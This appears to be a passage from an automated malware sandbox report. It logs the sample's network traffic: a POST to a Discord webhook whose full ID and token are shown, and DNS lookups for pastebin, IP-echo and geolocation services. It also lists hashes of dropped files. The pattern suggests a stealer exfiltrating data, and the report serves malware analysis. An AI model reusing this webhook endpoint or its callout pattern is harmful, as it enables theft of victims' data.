POST https://discordapp.com/api/webhooks/760580485616369734/e1QxCJz2FnJj53U5oR7ZbEgOzQKcCUaVd0hMf6FNwe9la9GAEOAGmv-H1d9DzVC5ZjPuHTTP Response
404
-
58 B 106 B 1 1
DNS Request
pastebin.com
DNS Response
104.20.4.235104.20.3.235172.67.19.24
-
56 B 107 B 1 1
DNS Request
c.pki.goog
DNS Response
142.250.179.227
-
59 B 91 B 1 1
DNS Request
icanhazip.com
DNS Response
104.16.185.241104.16.184.241
-
65 B 81 B 1 1
DNS Request
www.geodatatool.com
DNS Response
158.69.65.151
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.130.233162.159.134.233162.159.133.233162.159.135.233162.159.129.233
-
60 B 140 B 1 1
DNS Request
discordapp.com
DNS Response
162.159.134.233162.159.133.233162.159.135.233162.159.129.233162.159.130.233
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD571317bea6f2cc496e28d6f32710cff95
SHA10ca93e1b5e1ecf1e944865dad1d7418842bb2a12
SHA25608cc988aa56629186459b2324dead5e54e6df21b0b9617bee582c5c57b576f39
SHA512dd621e7b07c23b349e6efe555c7aefcf1abca3a35b3d421c48f12ec60b9f0813d26949d7c66556c98117a895aba35e3274fe14e4f79e93e05a83c951edce8ac9
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b